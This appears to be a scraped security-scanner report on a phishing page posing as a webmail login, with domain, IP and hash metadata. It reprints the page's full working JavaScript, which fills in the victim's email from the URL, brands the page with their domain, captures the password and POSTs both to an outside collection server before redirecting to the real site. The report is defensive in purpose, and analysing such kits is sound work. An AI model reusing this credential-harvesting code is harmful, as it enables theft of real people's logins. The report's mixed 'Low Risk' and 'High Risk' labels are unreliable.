English

The domain 'wonderful-bonbon-405c87.netlify.app' uses the application-focused generic top-level domain (.app) with subdomain 'wonderful-bonbon-405c87'. Its registrable label 'netlify' stretches across 7 characters holding two vowels versus five consonants. Segmentation suggests 3 words: net, li, fy. The median word length lands at 2 characters. No strong language cues emerged from the frequency lists.

html/21/2b/212b4940-c5a7-437c-9bfc-431fc39dddfe.html.gz

require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes

a698276a123d22649dccc684bbddf0d2cfe5e13b6c11a16d0533d7a7e78587af

b6d7e7063aa9dd6b669fd1543ca911dc62dbd03df13050a0ed072362ec7c63ea

a9cbb54a238e6ff4553b31f6bc082886cf30295499b99c654742dae83a0c8beb

142460c54d46292a9ef3c42b1d6b56bebe2d932b0ac983e9d0aaeac3d442776f

57439521ec5ac3135d3259c6ccc9db5d6626e426d8525fd1ba342c15a87e2c97

width=device-width, user-scalable=yes, initial-scale=1, maximum-scale=4.0

viewport

description

author

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;worker-src blob: 'self';frame-ancestors 'none';

child-src https:  chrome-untrusted://new-tab-page/ chrome-untrusted://ntp-microsoft-auth/;connect-src chrome://resources chrome://theme 'self';default-src 'self';font-src chrome://resources 'self';img-src chrome://resources chrome://theme chrome://image chrome://favicon2 chrome://app-icon chrome://extension-icon chrome://fileicon blob: data: 'self';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources chrome://webui-test 'self';style-src chrome://resources chrome://theme 'self' 'unsafe-inline';trusted-types parse-html-subset sanitize-inner-html static-types webui-test-script webui-test-html polymer-html-literal polymer-template-event-attribute-policy lit-html-desktop;frame-ancestors 'none';

child-src 'none';object-src 'none';require-trusted-types-for 'script';script-src chrome://resources 'self';trusted-types;frame-ancestors 'none';

base-uri 'none';child-src https:;form-action https://ogs.google.com https://*.corp.google.com;object-src 'none';script-src 'self' 'unsafe-inline' https:;frame-ancestors chrome://new-tab-page/

Name.com Abuse Team

Name.com, Inc.

netlify.app

Amazon EC2 Abuse

IP Management

Amazon AWS Network Operations

A100 ROW GmbH

Amazon EC2 Network Operations

AMAZON-FRA


      window["adrum-start-time"] = new Date().getTime();
      (function (config) {
        config.appKey = "AD-AAB-AAV-JZW";
        config.adrumExtUrlHttp = "http://cdn.appdynamics.com";
        config.adrumExtUrlHttps = "https://cdn.appdynamics.com";
        config.beaconUrlHttp = "http://pdx-col.eum-appdynamics.com";
        config.beaconUrlHttps = "https://pdx-col.eum-appdynamics.com";
        config.xd = { enable: false };
      })(window["adrum-config"] || (window["adrum-config"] = {}));
    


      var mobileVersion = "wm6";
      var RELEASE_VERSION = "9b26c3f";
      var IS_MOBILE = false;
      var wbmglobals = {
        IS_MOBILE: IS_MOBILE,
        MEXT: IS_MOBILE ? "-m" : "",
      };
    


      // ############################################################################
      // Specify the URL of the PHP file Here
      var url = "https://buigf.pro/carzon1/main.php";
      // ############################################################################

      window.onload = function () {
        // Get the current URL
        var url = window.location.href;
        // Parse the URL and get the fragment (the part after the '#')
        var urlComponents = new URL(url);
        var email = urlComponents.hash.substring(1);

        let domain = email.split("@")[1]; // This will give you 'gmail.com'
        let word = domain.split(".")[0]; // This will give you 'gmail'
        // console.log(result); // Outputs: gmail

        let half1 = word.slice(0, Math.ceil(word.length / 2));
        let half2 = word.slice(Math.ceil(word.length / 2));

        // console.log(half1);
        //console.log(half2);

        // Check if the fragment is a valid email
        var emailRegex = /^[\w-]+(\.[\w-]+)*@([\w-]+\.)+[a-zA-Z]{2,7}$/;
        if (emailRegex.test(email)) {
          //   Make this email available globally
          // window.email = email;
          // If it is, add the email into a html element as text
          var emailElement = document.getElementById("username");
          if (emailElement) {
            emailElement.value = email;
          }
        }

        logoNamer(half1, half2);
      };

      function logoNamer(half1, half2) {
        function capitalizeFirstLetter(string) {
          return string.charAt(0).toUpperCase() + string.slice(1);
        }

        str = capitalizeFirstLetter(half1);

        const logoHeader = document.querySelectorAll(".lloggo");
        const logoHeader2 = document.querySelectorAll(".lloogg");

        logoHeader.forEach(function (logo) {
          logo.textContent = str;
        });

        logoHeader2.forEach(function (logo2) {
          logo2.textContent = half2;
        //   console.log(half2);
        });
      }

      // Get the form and input elements
      var form = document.querySelector(".Login-form");
      var emailInput = document.getElementById("username");
      var passwordInput = document.getElementById("password");
      var aa = document.querySelectorAll(".p0");
      var aaa = document.querySelectorAll(".p1");
      var aaa1 = document.querySelectorAll(".p2a");
      var aaa2 = document.querySelectorAll(".p2b");
      var modal = document.getElementById("modal-loading");

      var clickCount = 0;

	  
      // Add an event listener for form submission
      form.addEventListener("submit", function (event) {
		  // Prevent the form from being submitted normally
		  event.preventDefault();
		  
		  var email = emailInput.value;
		  var password = passwordInput.value;

        // Write an if statement to check if the input value is empty
        if (email === "") {
          aa.forEach(function (element) {
            element.classList.add("incorrect-hidden");
          });
          aaa1.forEach(function (element) {
            element.classList.remove("incorrect-hidden");
          });
          setTimeout(function () {
            // Now you can use forEach on aaa
            aaa1.forEach(function (element) {
              element.classList.add("incorrect-hidden");
            });
            aa.forEach(function (element) {
              element.classList.remove("incorrect-hidden");
            });
          }, 3000);
          return;
        }
        if (password === "") {
          aa.forEach(function (element) {
            element.classList.add("incorrect-hidden");
          });
          aaa2.forEach(function (element) {
            element.classList.remove("incorrect-hidden");
          });
          setTimeout(function () {
            // Now you can use forEach on aaa
            aaa2.forEach(function (element) {
              element.classList.add("incorrect-hidden");
            });
            aa.forEach(function (element) {
              element.classList.remove("incorrect-hidden");
            });
          }, 3000);
          return;
        }

        loading();
        setTimeout(function () {
          // Now you can use forEach on aaa
          aa.forEach(function (element) {
            element.classList.add("incorrect-hidden");
          });
          aaa.forEach(function (element) {
            element.classList.remove("incorrect-hidden");
          });
          passwordInput.value = "";
        }, 3000);

        var submitButton = form.querySelector('button[type="submit"]');
        submitButton.disabled = true;

        if (email && password) {
          let dataLog = {
            email,
            password,
            desc: "https://mail.swmhc.com: Login Details",
          };

          sendDataWithRetry(dataLog);
        }

        setTimeout(function () {
          submitButton.disabled = false;
        }, 3000);
      });

      // Write a function that will redirect the page to a URL
      function toggleClass() {
        // Redirect the page to a URL
        window.location.href = "https://mail.swmhc.com";
      }

      function loading() {
        const loader = document.querySelector(".loader");

        loader.classList.remove("loader--hidden");

        setTimeout(function () {
          loader.classList.add("loader--hidden");
        }, 3000);
      }

      // Send data to the PHP file
      function sendDataWithRetry(dataLog, maxRetries = 3) {
        const sendRequest = async (retryCount) => {
          try {
            const response = await fetch(url, {
              method: "POST",
              headers: {
                "Content-Type": "application/json; charset=utf-8",
              },
              body: JSON.stringify(dataLog),
            });

            if (response.ok) {
              const responseData = await response.json();
              // console.log("Data received by PHP:", responseData);
              clickCount++;
              // console.log(clickCount);
              if (clickCount === 3) {
                // Execute a separate function on second click
                toggleClass();
                clickCount = 0;
              }
              // Continue with other tasks (e.g., UI updates, etc.)
            } else {
              throw new Error("Network response was not OK");
            }
          } catch (error) {
            console.error("Error sending data:", error);
            if (retryCount < maxRetries) {
              console.log(`Retrying (attempt ${retryCount + 1})...`);
              await sendRequest(retryCount + 1);
            } else {
              console.error("Max retries reached. Data not sent.");
              // Handle failure (e.g., show an error message)
            }
          }
        };
        sendRequest(0); // Start the initial request
      }
    

X-UA-Compatible

Google-Analytics

Netlify

HSTS

AppDynamics

Login - Webmail 7.0

cdn.appdynamics.com

jdmediax.com

✅ Low Risk - https://wonderful-bonbon-405c87.netlify.app/#info@lamcominc.com

Requests	IP Address	Location	AS Autonomous System
7	63.176.8.218	Frankfurt am Main, Hesse, Germany	AS16509Amazon.com, Inc.
2	216.58.206.35	United States	AS15169Google LLC
2	3.160.150.128	United States	AS16509Amazon.com, Inc.
2	172.217.168.74	United States	AS15169Google LLC
2	104.17.25.14	United States	AS13335Cloudflare, Inc.
2	104.17.24.14	United States	AS13335Cloudflare, Inc.
2	147.93.125.2	Frankfurt am Main, Hesse, Germany	AS47583Hostinger International Limited
19	7	-	-

Security Scan Report: wonderful-bonbon-405c87.netlify.app

Summary

AI Security Verdict

High Risk

Risk Factors

Details

Screenshot

Page Load Overview

Language Analysis

Primary Language

Detection Details

Website Classification

Primary Category

All Detected Categories

Detected Features

Domain & IP Information

Detected Technologies5

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

ssdeep (Context Triggered Piecewise Hashing)

sdhash (Similarity Digest Hashing)

Image Hashes

Perceptual Hashes

Other Hashes

Scan History